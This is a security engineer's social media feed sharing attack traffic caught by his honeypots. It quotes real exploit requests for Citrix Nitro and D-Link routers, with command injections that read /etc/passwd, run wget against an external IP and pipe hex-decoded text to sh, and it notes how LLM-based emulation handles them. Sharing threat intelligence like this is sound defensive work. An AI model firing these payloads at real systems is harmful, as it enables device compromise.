Niels Heinen

@[email protected]
68 Followers
61 Following
82 Posts
Information security engineer - security at scale - honeypots
Githubhttps://github.com/mrheinen
Show threadNiels HeinenFeb 15
It looks like a variant of https://www.exploit-db.com/exploits/36442
Citrix Nitro SDK - Command Injection

Citrix Nitro SDK - Command Injection. CVE-119834CVE-2015-2838 . webapps exploit for Linux platform

Exploit Database
Niels HeinenFeb 15

Interesting Netscaler payload caught by my Lophiid honeypots:

GET /nitro/v1/config/systemfile?args=filename:/etc/passwd%3Bping%20-c%204%20178.16.54.17 HTTP/1.1
Host: x.x.x.x
Connection: close
X-Nitro-Pass: nsroot
X-Nitro-User: nsroot

Does anyone know this vuln ?

#honeypot #dfir #infosec #cybersecurity

Niels HeinenFeb 9
@cR0w yes I think so too, that's also where I got the inspiration from to add it to my honeypots. I was hoping for some more targeted attacks with this one and not the usual large scans (given that it's not such a popular service) but I guess I was naive ;/
Niels HeinenFeb 9
After adding emulation of HPE OneView to my honeypots, I'm seeing quite an uptick in scans for it. Could be coincidence but regardless it's interesting to see so much traffic for a rather unpopular (?) service. Shodan for example shows 27 instances at the moment.

#infosec #cybersecurity #dfir #honeypot
Show threadNiels HeinenJan 26

@hrbrmstr @iagox86 interesting!

Interesting! Thanks for sharing.

So I only have 50 honeypots (for personal entertainment) and guess you guys have quite a few more than that :). More importantly, I have them across 6 datacenters which really limits the coverage.

But I'm not complaining: I get more data than I can handle and have fun playing with it (and trying to extract new info in new ways when possible)

Niels HeinenJan 26
Chris John Riley  Jan 25

Just under a year ago I was planning to leave Google after 10 years. Since then I've been considering what's next (and doing some advisory work on the side).

I've slowly been giving more and more thought to how to give back in a sustainable way that works for me.

With that in mind, if you know of any organisations who offer security consulting/testing (pentesting) for NGOs or other worthy causes, please share 🙏

(Please re-toot for reach)

Niels HeinenJan 26

Suddenly seeing exploitation attempts of CVE-2019-17621 (D-Link DIR-859 Wi-Fi router RCE). In 3 years of running my Lophiid honeypots, this is the first time I see this specific vuln being exploited.

An example request:

SUBSCRIBE /gena.cgi?service=`echo ; wget http://185.93.89.75/81_CAJ0BIC0CCF0BJA_CVE-2019-17621 -O /dev/null; echo >` HTTP/1.1
Host: x.x.x.x
Callback: <http://192.168.0.2:1337/ServiceProxy0>
Connection: close
Nt: upnp:event
Timeout: Second-1800
User-Agent: Mozilla/1.0

#honeypot #dfir #infosec #cybersecurity #threatintel

Niels HeinenJan 17

My lophiid honeypots use varies LLM models for different tasks. For shell code execution emulation they use Gemini 2.5 flash and it dealt with this payload really nicely:

echo 7c6563686f2532305243455f544553545f313233 | xxd -r -p | sh

It correctly understood that xxd reversed the hex and it understood that the resulting string were shell commands that echoed the string "RCE_TEST_123"

I think this is pretty cool. Shell code emulation with LLMs has a lot of potential

#infosec #dfir #honeypot

Niels HeinenDec 31

Stubborn AI honeypots give me grey hair.

Attacker sends payload:

"username=anonymous%00]]%0dlocal+h+%3d+io.popen("this is vulnerable to CVE-2025-47812")%0dlocal+r+%3d+h%3aread("*a")%0dh%3aclose()%0dprint(r)%0d--&password=
"

And the AI responsible for handling the response sends the following back to the attacker:

"This system is not affected by CVE-2025-47812.
"

*sigh*

#dfir #infosec #cybersecurity #honeypot

Niels HeinenDec 28

My Lophiid honeypots got spammed with a payloads like "234513+true+1994175". The LLM integration understood the intricacies of Javascript and caused the honeypots to respond with the correct answer 2228689

#honeypot #dfir #infosec #aisecurity #cybersecurity #llm